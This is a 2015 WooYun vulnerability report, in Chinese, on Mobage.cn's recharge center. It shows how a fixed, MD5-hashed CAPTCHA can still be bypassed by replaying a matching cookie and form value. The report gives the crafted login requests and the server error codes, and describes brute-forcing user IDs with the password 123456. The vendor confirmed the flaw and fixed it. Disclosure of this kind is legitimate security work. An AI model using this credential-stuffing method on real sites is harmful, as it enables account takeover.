当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151672

漏洞标题:梦宝谷充值中心绕过验证码撞库(修复绕过或者说未修复完全)

相关厂商:mobage.cn

漏洞作者: 路人甲

提交时间:2015-11-04 10:13

修复时间:2015-11-10 15:08

公开时间:2015-11-10 15:08

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-10: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

梦宝谷充值中心绕过验证码撞库(修复绕过或者说未修复完全),看到有礼物就来了

详细说明:

WooYun: 梦宝谷充值中心绕过验证码撞库
看前一个漏洞
是验证码明文写在cookie中,所以可以直接拿过来用,绕过验证码
来看看修复后的结果

POST /user/ajax_login_action?time=0.5485217147506773 HTTP/1.1
Cookie: PHPSESSID=m2bgs2tue07l95g39uo3o5gp47; Hm_lvt_26faeb9e516e9d400ebfe266ae8cfbfa=1446601563; Hm_lpvt_26faeb9e516e9d400ebfe266ae8cfbfa=1446601563; verify_code=989fd43524b3ab0b60be66f14ad7ac5a
user_name=1144750&password=12344&verify_code=iebj


可以看到verify_code进行了加密
看了下是md5加密方式

11.jpg


4位的md5,基本100%可以破解的,所以找个md5解密的接口破解即可
不过我们不用这种方式
我们看一下
登陆的时候,验证码错误

Cookie: PHPSESSID=m2bgs2tue07l95g39uo3o5gp47; Hm_lvt_26faeb9e516e9d400ebfe266ae8cfbfa=1446601563; Hm_lpvt_26faeb9e516e9d400ebfe266ae8cfbfa=1446601563; verify_code=9d993bb83afa52e88ceda2a62f0ecb3d
user_name=1144750&password=121212&verify_code=iebj


服务器返回301错误{"error_code":301,"error_msg":"\u9a8c\u8bc1\u7801\u9519\u8bef"}
登陆去掉verify_code字段,则返回104错误
user_name=1144750&password=121212
{"error_code":104,"verify_check":true}
当验证码正确,密码错误时,返回103错误
{"error_code":103,"verify_check":true}
而验证码的校验,仅仅是验证cookie中跟post中的验证码是否一致而已!!!!!!
我们就构造

verify_code=989fd43524b3ab0b60be66f14ad7ac5a
user_name=1144750&password=12344&verify_code=iebj


则服务器一致是验证码验证通过,所以此处可以设置密码为123456,遍历爆破用户id
爆破过程就不多说了,前面都有

11.jpg


返回843的都是登陆成功的,我们随便试一下

11.jpg


漏洞证明:

见详细描述

修复方案:

要确实的修复啊

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-04 12:34

厂商回复:

感谢指导〜

最新状态:

2015-11-10:新增加加密字段,客户端提交时与服务器验证